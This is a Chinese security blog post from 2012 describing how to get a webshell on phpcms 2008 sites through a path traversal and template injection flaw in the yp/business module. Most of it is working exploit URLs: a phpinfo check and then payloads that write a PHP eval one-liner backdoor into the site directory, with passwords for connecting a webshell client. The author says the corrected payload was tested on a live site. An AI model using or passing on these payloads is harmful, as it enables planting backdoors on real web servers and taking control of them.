您的位置 » 首页 » 实用工具 » phpcms 2008 getshell漏洞连接方法

phpcms 2008 getshell漏洞连接方法

发表于5年前 | 作者: seay | 分类: 实用工具 | 孵化于:2012年07月26日 | 文章热度:10,251 次 全屏阅读

显示不全请点击全屏阅读

关于phpcms 2008 getshell漏洞  拿shell

http://www.wooyun.org/bugs/wooyun-2010-09563

这个   注册企业会员 然后链接放exp  info就出来了

EXP:http://localhost/yp/business/?file=../../admin/block&action=post&blockid=eval&template=<?php phpinfo();exit();?>

 

不过呢  写一句话 shell   那样的话 用菜刀链接 就不行。。

 

这里找到一个好方法 就是。。写在目录下面。。包含一句话

madman.in/yp/business/?file=../../admin/block&action=post&blockid=eval&template=<?php fwrite(fopen(‘x.php’,’a’),’<?php @eval($_POST[m])?>’);exit();?>

链接方法:  madman.in/yp/business/x.php  密码 m

摘自:http://madman.in/madman5/806.htm | 疯子博客

原文中写入一句话是不会成功的,刚本人找了一个phpcms2008的站测试了

修改了下一句话代码

EXP如下http://madman.in/yp/business/?file=../../admin/block&action=post&blockid=eval&template=<?fputs(fopen(“1.php”,”w”),”<?eval($_POST[c]);?>”);exit();?>

链接方法:  http://http://madman.in/yp/business/1.php密码 c

版权为疯子所有

Tags:

phpcms2008漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/560/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有1个筒子留下了脚印...

  • 代理记账 说:
    1楼
    2012 年 7 月 26 日 上午 4:52 回复

    学习,学习了,^_^

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)